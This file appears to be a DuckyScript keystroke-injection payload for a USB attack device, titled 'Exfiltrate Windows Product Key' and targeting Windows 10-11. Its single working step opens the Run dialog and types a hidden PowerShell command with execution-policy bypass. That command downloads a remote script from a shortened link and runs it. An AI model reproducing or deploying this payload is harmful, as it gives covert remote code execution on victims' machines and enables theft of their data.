REM ###################################################
REM #                                                 #
REM # https://github.com/aleff-github/                #
REM # Desc. example: Aleff (Link up)                  #
REM # Title        : Exfiltrate Windows Product Key   #
REM # Author       : NazarHK                          #
REM # Version      : 1.0                              #
REM # Target       : Windows 10-11                    #
REM # Requirements : Internet access                  #
REM #                                                 #
REM ###################################################

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -ep bypass -Command "irm https://bit.ly/49SFZ7f | iex"
ENTER
